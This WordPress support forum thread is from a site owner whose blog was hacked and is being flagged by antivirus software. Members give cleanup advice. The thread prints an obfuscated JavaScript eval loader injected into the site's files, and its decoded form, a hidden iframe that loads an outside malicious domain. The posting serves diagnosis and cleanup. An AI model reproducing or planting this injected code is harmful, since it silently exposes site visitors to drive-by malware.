WordPress.org

Ready to get started?Download WordPress

Forums

I think my blog has been hacked!! (8 posts)

  1. jonnyd
    Member
    Posted 5 years ago #

    Hi all,

    I think my website has been hacked. I cannot load it anymore and Nortong blocks it with 'HTTP Malicious Toolkit Variant Activity'.

    Anybody any idea what might be going on?

    Thanks for any help with this.

    jd

    The blog is:

    http://www.downwindheaven.com/blog

  2. kmessinger
    Volunteer Moderator
    Posted 5 years ago #

    Yes, you have been hacked. When I first brought up your site my virus program blocked 4 viruses. In any case your site is home for many trojans. Hopefully your database is ok.

  3. jonnyd
    Member
    Posted 5 years ago #

    any idea what I can do about this?

  4. WebDev WaxLotus LLC
    Member
    Posted 5 years ago #

    1) Take your site offline to prevent spreading the evil.
    2) Get your host to help you clean it up.
    3) Figure out how this happened. Your host should be able to help you!

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://olu85.com/blog/?p=15

  5. jonnyd
    Member
    Posted 5 years ago #

    I found this bit of code sprinkled through all my wordpress files and index pages...

    function db3b23(x) {var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,61,14,3,1,44,42,15,39,45,0,0,0,0,0,0,47,30,62,59,13,41,34,6,23,54,57,22,29,56,55,31,16,24,11,12,0,26,27,21,52,53,18,0,0,0,0,28,0,36,4,20,8,7,17,32,33,40,37,35,51,9,38,58,50,43,48,49,5,2,46,25,10,60,19);for(g=Math.ceil(y/c);g>0;g--){q='';for(z=Math.min(y,c);z>0;z--,y--){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(148^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}db3b23('kN@Br@0MoA2MY3AM88o5P@@Bs7Cqr@01h8Oyo3vvkVA0ge7@lFU0pVA1Je79oHOBs8xy9x7qN3x98VB1EUR0g32JvvCv5K7yrN7M1@@Bov@Jl@RMCvo50nL1gl@vn@OMo37@wH7MyqqJYq7yC87@1oRigpxE1BC5rN6y5A7ilBC5IZCM137My8UEjUx9yeO0ll7MEuxEXA2M9kOyEURy1O2JMHOCv60Boe@96Fov1R@JY8Oy62V@') </script><!-- downwindheaven.com -->

    Anyone recognise it?

  6. whooami
    Member
    Posted 5 years ago #

    no, and i wouldnt see the point if I did, honestly. im not sure why theres a comment with your domain name in it though.

    Ive not googled that code, but are you positive thats not something that you actually added, or is the comment at the end the start of something else?

    --

    edit, nm i googled it

  7. whooami
    Member
    Posted 5 years ago #

    google is truly amazing, btw. its this really nifty, new search engine thing, where you can like, you know, put stuff into this box, and click one key, and you get all kind of answers back.

    window.status='Done';
    document.write('<iframe name=6d40ec src="http://add-block-filter.info/t/?'+Math.round(Math.random()*16682)+'6d40ec'+'" width=439 height=38 style="display:none"></iframe>')
  8. figaro
    Member
    Posted 5 years ago #

    @jonnyd: Haven't seen this before, but maybe this will help.

    http://www.sitepoint.com/forums/showthread.php?p=4191966

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.